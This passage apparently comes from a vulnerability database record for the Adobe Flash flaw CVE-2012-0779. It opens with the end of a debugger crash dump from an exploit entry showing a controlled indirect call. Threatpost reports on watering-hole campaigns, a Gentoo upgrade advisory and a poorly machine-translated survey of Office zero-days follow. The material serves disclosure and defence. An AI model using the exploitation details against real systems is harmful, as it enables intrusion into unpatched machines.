efl=00050202\r\nFlash32_11_2_202_228!DllUnregisterServer+0x300e84:\r\n104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]\r\nds:0023:44444470=????????\r\n\r\n0:000> u eip\r\nFlash32_11_2_202_228!DllUnregisterServer+0x300e84:\r\n104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]\r\n104b1b30 53 push ebx\r\n104b1b31 ffd0 call eax\r\n\r\n=end\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19369/"}], "threatpost": [{"lastseen": "2018-10-06T23:03:04", "bulletinFamily": "info", "description": "A recent string of Web site hacks at Amnesty International and other NGOs are evidence of a campaign of cyber espionage directed against human rights orgnaizations, according to a report from The Shadowserver Foundation.\n\nIn a report on Tuesday, the Foundation [said that its members had witnessed an increase in what it termed \u201cstategic web compromises\u201d in recent weeks](<http://blog.shadowserver.org/>). The attacks are designed to target a specific population likely to visit those Web sites, rather than distribute malware far and wide, and include attacks on Web sites for Amnesty International, the Center for Defense Information and other sites in Asia, Europe and North America.\n\nExploits for newly disclosed vulnerabilities in Adobe Flash and Java. Shadowserver said that, at the time of the report, several \u201chigh profile websites are still compromised and serving the most recent Flash exploit.\u201d That vulnerability (CVE-2012-0779) was patched by Adobe in early May and was linked to a series of targeted attacks, the company said. Among those Web sites were the Center for Defense Information, Amnesty International Hong Kong, and the Cambodian Ministry of Foreign Affairs ASEAN, Shadowserver said on Monday. Visiting one of those sites \u201ccan initiate a chain reaction in which malicious code is loaded from multiple websites and results in a system compromise for vulnerable systems without other mitigating factors,\u201d the group warned.\n\nThe report is supported by anecdotal evidence of a campaign of compromises on sites affiliated with human rights groups. Web properties belonging to Amnesty were targeted in recent weeks, and in December, 2011. In the most recent attacks, a Web property affiliated with Amnesty\u2019s Hong Kong branch was found to be[ serving up a copy of the GhostRAT Trojan horse programs to those that visited the site](<https://threatpost.com/amnesty-international-website-compromised-serving-gh0st-rat-051112/>). The same program was [used in targeted attacks on Free Tibet activists within and outside China, as well as the Tibetan Government in Exile in March](<https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/>). \n\nThe Shadowserver Foundation, a volunteer group of Internet security professionals that tracks malware and botnet activity, said that the Amnesty attacks suggest advanced persisten threat (APT) type actors. They are just part of a much larger campaign of targeted attacks. Rather than financial profit, the attackers seek communications, research and development (R&D), intellectual property (IP), and business intelligence, the group said. \n", "modified": "2013-04-17T16:32:13", "published": "2012-05-16T21:01:53", "id": "THREATPOST:19EA705538DF596E222DB44DD719ED6C", "href": "https://threatpost.com/report-strategic-web-compromises-behind-recent-hack-amnesty-others-051612/76575/", "type": "threatpost", "title": "Report: Strategic Web Compromises Behind Recent Hack of Amnesty, Others", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:08", "bulletinFamily": "info", "description": "Adobe has released a patch for a serious Flash vulnerability that is being used in targeted attacks right now. The updates fix the vulnerability in Windows, Mac, Linux and Android systems. \n\nThere is an exploit in the wild that is targeting systems running vulnerable versions of Flash on Windows in Internet Explorer. Adobe is recommending that users update their systems to the new versions as soon as they can. \n\n\u201cThese updates address an object confusion vulnerability (CVE-2012-0779) that could cause the application to crash and potentially allow an attacker to take control of the affected system. \nThere are reports that the vulnerability is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious file delivered in an email message. The exploit targets Flash Player on Internet Explorer for Windows only,\u201d Adobe said in its [advisory](<http://www.adobe.com/support/security/bulletins/apsb12-09.html>). \n\nFlash is one the preferred targets for attackers these days, thanks to its presence on hundreds of millions of machines around the world. With an exploit already circulating for IE on Windows, it may not be long before exploits for Flash on other platforms surface, as well. The time to patch is now.\n", "modified": "2013-04-17T16:32:18", "published": "2012-05-04T15:58:21", "id": "THREATPOST:82D1CCA01BBF119D850004CAE7F70E19", "href": "https://threatpost.com/adobe-releases-patch-flash-bug-being-used-targeted-attacks-050412/76526/", "type": "threatpost", "title": "Adobe Releases Patch for Flash Bug Being Used in Targeted Attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:18", "bulletinFamily": "info", "description": "**[](<https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/>)UPDATE**\u2013The same team that attacked [Google in the Aurora campaign](<https://threatpost.com/aurora-attack-malware-components-may-be-four-years-old-012010/>) in 2009 is still active and has been conducting a long-term campaign targeting defense contractors, financial services companies, energy companies, human rights organizations and government agencies using a seemingly inexhaustible supply of zero day vulnerabilities. The crew is using a variety of techniques to go after its targets, most notably compromising legitimate Web sites frequented by employees of the targeted organizations and then delivering exploits for one or more of their stockpiled zero-day bugs, researchers say.\n\nThe team behind these operations appears to be in the top tier of professional attack teams, possessing the ability to do original research to find new vulnerabilities in popular applications such as Adobe Flash and Internet Explorer, and then write exploits for those flaws, as well. Researchers at Symantec have been tracking the group, which they\u2019ve dubbed the Elderwood gang, for some time, and have seen the crew using previously unknown vulnerabilities in rapid succession over the course of the last couple of years in attacks aimed at defense contractors, government agencies and other high-value targets.\n\nThe number of groups doing their own research and finding zero days and then writing exploits for them is virtually impossible to know, given the structure of the cybercrime underground, but it is thought to be a small number relative to the overall population of attackers. That kind of research takes time, money and high-level technical skills that many groups solely interested in stealing money just don\u2019t have.\n\n\u201cIn order to discover these vulnerabilities, a large undertaking would be required by the attackers to thoroughly reverse-engineer the compiled applications. This effort would be substantially reduced if they had access to source code. The vulnerabilities are used as needed, often within close succession of each other if exposure of any of the vulnerabilities is imminent,\u201d Gavin O\u2019Gorman and Geoff McDonald of Symantec wrote in a detailed [analysis of the Elderwood crew\u2019s tactics](<https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf>).\n\n\u201cThe scale of the attacks, in terms of the number of victims and the duration of the attacks, are another indication of the resources available to the attackers. Victims are attacked, not for petty crime or theft, but for the wholesale gathering of intelligence and intellectual property. The resources required to identify and acquire useful information\u2014let alone analyze that information\u2014could only be provided by a large criminal organization, attackers supported by a nation state, or a nation state itself.\u201d\n\nThe researchers said that this group is utilizing one technique, which they call a \u201cwatering hole\u201d attack, that involves waiting for the targets to come to them rather than going after the targeted organizations or employees directly. To accomplish this, the Elderwood gang identifies a Web site that\u2019s frequented by employees of organizations in the sector that they\u2019re targeting, say financial services. They then compromise that site, whether through SQL injection or some other common technique, and plant exploit code on some of the public pages of the site. They then wait for the targeted employees to hit the pages, at which point the exploit fires and ideally (for the attackers) compromises the victim\u2019s machine.\n\nThe idea is roughly the same as a typical drive-by download attack that uses SQL injection as its initial vector to compromise a site, but in this case the attacker is going after a specific site rather than a large volume of vulnerable sites and is looking for a specific subset of victims, as well. Researchers at [RSA Security also analyzed attacks of this kind](<http://blogs.rsa.com/will-gragido/lions-at-the-watering-hole-the-voho-affair/>) in July, and found that the attackers were installing a variant of Gh0stRAT, a well-known remote-access tool that\u2019s been used in targeted [attacks by Chinese groups](<https://threatpost.com/ghostnet-shows-extent-online-spying-033009/>) for several years.\n\nJoe Stewart, director of malware research at Dell SecureWorks, has been following a series of attacks by groups loosely connected to the crew that Symantec is identifying as the Elderwood gang and said that there\u2019s no question about the group\u2019s capabilities.\n\n\u201cThey\u2019re definitely doing their own research, or paying someone for immediate access to it. They certainly have plenty of zero days they\u2019ve come out with,\u201d Stewart said. \n\nThis Elderwood group has used a number of zero days in the last couple of years as part of its attack campaigns, including the [CVE-2012-1535 Flash vulnerability](<https://threatpost.com/adobe-patches-critical-flash-bug-releases-massive-reader-update-081412/>) that Adobe patched last month and the [CVE-2012-1875 MSXML flaw](<https://threatpost.com/exploit-code-surfaces-cve-2012-1875-internet-explorer-bug-061812/>) in Internet Explorer that Microsoft fixed in June. The group will use exploits for these vulnerabilities both in Web-based attacks and in targeted spear-phishing email attacks. But in both cases, the goal is the theft of intellectual property.\n\n\u201cAlthough watering hole attacks have been known about since approximately March of 2011, the activity outlined in this report marks a substantial increase. Three zero-day exploits, CVE-2012-0779, CVE-2012-1875, and CVE-2012-1889 have all been used within a 30-day period to serve up back door Trojans from compromised websites,\u201d the paper says.\n\nThe connection to the attack on Google in late 2009, which was named Aurora at the time, comes both from some commonalities in the way that the attackers are obfuscating parts of their code, which also was seen in the Hydraq Trojan, the piece of malware used in the Google attack. \n\n\u201cWe believe the Hydraq attack and the recent attacks that exploit the vulnerabilities outlined above are linked,\u201d O\u2019Gorman and McDonald wrote.\n\n\u201cAdditional links joining the various exploits together included a shared command-and-control infrastructure. Trojans dropped by different exploits were connecting to the same servers to retrieve commands from the attackers. Some compromised websites used in the watering hole attacks had two different exploits injected into them one after the other. Yet another connection is the use of similar encryption in documents and malicious executables. A technique used to pass data to a SWF file was re-used in multiple attacks. Finally, the same family of Trojan was dropped from multiple different exploits,\u201d the researchers said.\n\nThe Elderwood team may have a custom platform set up to help take exploit code for a new vulnerability, drop it into a benign Word document or PDF and then bundle it with the Trojan payload to have the components for a new attack at hand as quickly as possible. The crew also has created a SWF file that is used in multiple attacks, with small changes, to help place their exploit code in the optimal part of memory.\n\n\u201cInstead of developing code to perform these tasks for each different exploit, the attackers have developed a common SWF file that is used solely to create the correct conditions in memory and accepts a parameter specifying where to download the Trojan. In some attacks, the parameter name was \u201cElderwood.\u201d The same SWF file was seen used when exploiting 3 different vulnerabilities (CVE-2012-0779, CVE-2012-1875, CVE-2012-1889). By using a common SWF file, the attackers can simply deploy a new trigger, that is, a zero-day exploit, and the SWF handles the rest of the work, retrieving and decoding the back door Trojan,\u201d the researchers said.\n\nThe Elderwood team also seems to have an uncanny ability to sense when one of the zero days it has been using is about to be disclosed publicly. It often will shift to using a new vulnerability shortly before one of its current favorites is exposed, suggesting the crew watches the developments in the underground and legitimate security communities closely.\n\n\u201cThe group seemingly has an unlimited supply of zero-day vulnerabilities. The vulnerabilities are used as needed, often within close succession of each other if exposure of the currently used vulnerability is imminent,\u201d Symantec\u2019s report says.\n\nStewart of Dell SecureWorks said that he hasn\u2019t seen the groups he follows droppng a specific exploit because a vulnerability is about to be patched. But he said the Elderwood gang likely is part of one of the two main attack groups based in China, with this one centered in Beijing and another based around Shanghai.\n\n\u201cThey\u2019re one of the two main actor groups we see and we base that assessment on the sharing of infrastructure and where it\u2019s located and some other details,\u201d he said. \u201cThe reason they use so many different types of malware is that they probably have people inside the groups that have certain preferences, things they like and they\u2019re comfortable with. They use Gh0st, Hydraq, whatever they need. They have a lot of malware. It speaks to a large number of actors. They\u2019re all getting marching orders from the same place, but it\u2019s not the exact same people hitting the keys.\u201d\n\nThis larger group of attackers has been active for years, well before the attack on Google became public in early 2010.\n\n\u201cThey were active well before [the Google attack]. I have samples from them from the 2006 to 2007 time frame and some that are similar and probably them as far back as 2003,\u201d Stewart said. \n\n\u201cThis is years of constant, dedicated, persistent attacks.\u201d\n\n_This story was updated on Sept. 7 to add comments from Joe Stewart._\n", "modified": "2013-04-17T16:31:36", "published": "2012-09-07T14:41:30", "id": "THREATPOST:8118BE47AC766B8F6DD708B119E33DFE", "href": "https://threatpost.com/elderwood-crew-tied-google-aurora-attack-targeting-defense-energy-finance-companies-090712/76987/", "type": "threatpost", "title": "'Elderwood' Crew, Tied to Google Aurora Attack, Targeting Defense, Energy, Finance Companies", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "description": "Memory corruption due to invalid objects handling.", "modified": "2012-05-09T00:00:00", "published": "2012-05-09T00:00:00", "id": "SECURITYVULNS:VULN:12359", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12359", "title": "Adobe Flash Player memory corruption", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:21", "bulletinFamily": "unix", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.236\"", "modified": "2012-06-23T00:00:00", "published": "2012-06-23T00:00:00", "id": "GLSA-201206-21", "href": "https://security.gentoo.org/glsa/201206-21", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
